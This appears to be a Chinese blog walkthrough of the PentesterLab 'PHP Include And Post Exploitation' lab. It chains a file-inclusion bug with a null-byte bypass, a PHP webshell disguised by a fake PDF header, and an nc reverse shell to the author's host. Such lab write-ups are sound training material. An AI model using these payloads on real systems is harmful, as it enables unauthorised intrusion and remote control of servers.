PentesterLab-PHP Include And Post Exploitation
阿新 • • 發佈:2018-09-17
一句話 index mage bmi 沒有 http 密碼登錄 spa ads
一、打開頁面,看到這麽個頁面,按照慣例隨手點一點
二、Login處顯然是一個後臺登錄頁面,但前提是的有賬號密碼,看了下Submit這個頁面,發現url中有個page參數
三、nikto跑一下這個頁面。裏面有這麽一條信息很有意思
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
看樣子這個地方可能存在文件包含,把nikto這個結果拿過去請求一下
發現確實有個include函數,但是裏面的文件名後面自動添加了一個.php,想到可以%00截斷,請求以下鏈接,顯示除了passwd文件內容,看來沒有做限制,下面就去找利用點
/index.php?page=../../../../../../../../../../etc/passwd%00
四、這裏有個提交功能,寫了一個簡單地php 一句話木馬,放到test.php直接上傳,提示只能是PDF文件
試著抓包修改後綴名和Content-Type,都無法上傳,看來服務端可能是判斷了文件頭經過多次嘗試發現,只有當後綴名為.pdf且文件頭也為pdf文件頭時,才能上傳。創建test.pdf文件,內容如下
%PDF-1.5 <?php system($_GET[‘cmd‘]);?>
成功上傳,這裏文件第一行用於偽造pdf文件頭。
五、用上傳時的用戶名密碼登錄後臺,看到上傳的pdf下載鏈接,上傳到了uploads目錄,復制,回到最開始的頁面,page參數改為這個鏈接,成功包含文件,但出現報錯,缺少cmd參數
http://192.168.109.131/index.php?page=uploads/k.pdf%00
六、帶上cmd參數,向我們的服務器反彈一個shell回來
/index.php?page=uploads/k.pdf%00&cmd=nc%20x.x.x.x%209999%20-e%20/bin/bash
成功getshell
PentesterLab-PHP Include And Post Exploitation